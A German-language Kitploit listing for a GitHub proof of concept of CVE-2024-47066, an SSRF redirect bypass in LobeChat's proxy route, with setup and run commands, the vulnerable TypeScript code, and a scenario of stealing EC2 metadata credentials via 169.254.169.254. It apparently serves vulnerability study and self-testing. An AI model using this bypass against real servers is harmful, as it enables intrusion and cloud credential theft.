Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-47066 — Proof-of-Concept für CVE-2024-47066 | Kitploit
Tools/GitHubGitHub/l8bl/cve-2024-47066
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCloud-Sicherheit
GitHubl8bl/cve-2024-47066

CVE-2024-47066

Proof-of-Concept für CVE-2024-47066

Repository anzeigen
41vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-47066

★ CVE-2024-47066 LobeChat SSRF PoC ★

Beschreibung

CVE-2024-47066 : LobeChat ist ein Open-Source-Framework für KI-Chat. Vor Version 1.19.13 berücksichtigt der in src/app/api/proxy/route.ts implementierte Schutz gegen Server-Side Request Forgery keine Weiterleitungen und kann umgangen werden, wenn ein Angreifer eine externe schädliche URL bereitstellt, die auf interne Ressourcen wie ein privates Netzwerk oder eine Loopback-Adresse weiterleitet. Version 1.19.13 enthält eine verbesserte Korrektur für das Problem.

Reporter: a1loy

https://github.com/user-attachments/assets/2c4a3be0-5732-48f5-a96c-d361fd914fec

Verwendung

Git klonen

root@kitploit:~
git clone https://github.com/l8BL/CVE-2024-47066.git
cd CVE-2024-47066

Verwundbare Umgebung einrichten

root@kitploit:~
cd docker
docker-compose up -d

(Extern) LodeChat --> SSRF-ANGRIFF --> (Intern) http://www.internal-service:4000

Pakete installieren

root@kitploit:~
pip install -r requirements.txt

Befehl

root@kitploit:~
python3 CVE-2024-47066.py -v <URL_TO_EXPLOIT> -i <URL_TO_REQUEST>

Beispiel

root@kitploit:~
python3 CVE-2024-47066.py -v http://localhost:3210 -i http://www.internal-service:4000

Ausgabe

CVE-2024-47066 alt text

Ergebnis

alt text

Analyse

Verwundbare Stelle (/app/api/proxy/route.ts)

root@kitploit:~
import { isPrivate } from 'ip';
import { NextResponse } from 'next/server';
import dns from 'node:dns';
import { promisify } from 'node:util';

const lookupAsync = promisify(dns.lookup);

export const runtime = 'nodejs';

/**
 * just for a proxy
 */
export const POST = async (req: Request) => {
  const url = new URL(await req.text());
  let address;

  try {
    const lookupResult = await lookupAsync(url.hostname);
    address = lookupResult.address;
  } catch (err) {
    console.error(`${url.hostname} DNS parser error:`, err);

    return NextResponse.json({ error: 'DNS parser error' }, { status: 504 });
  }

  const isInternalHost = isPrivate(address);

  if (isInternalHost)
    return NextResponse.json({ error: 'Not support internal host proxy' }, { status: 400 });

  const res = await fetch(url.toString());

  return new Response(res.body, { headers: res.headers });
};

Unterhalb von Zeile 26 gibt es keine Stelle, an der die Redirect-Antwort ausgewertet wird. Wenn man also einen URL-Shortener verwendet, kann man die Funktion isPrivate() leicht umgehen.

Angriffsszenario

EC2-Metadaten-Anmeldeinformationen stehlen

Sende eine Anfrage an http://169.254.169.254

Haftungsausschluss

Dieses Repository ist nicht als SSRF-Exploit für CVE-2024-47066 gedacht. Der Zweck dieses Projekts ist es, Menschen zu helfen, diese Schwachstelle zu verstehen und möglicherweise ihre eigenen Anwendungen zu testen.

Referenz

https://github.com/advisories/GHSA-3fc8-2r3f-8wrg

Tool herunterladen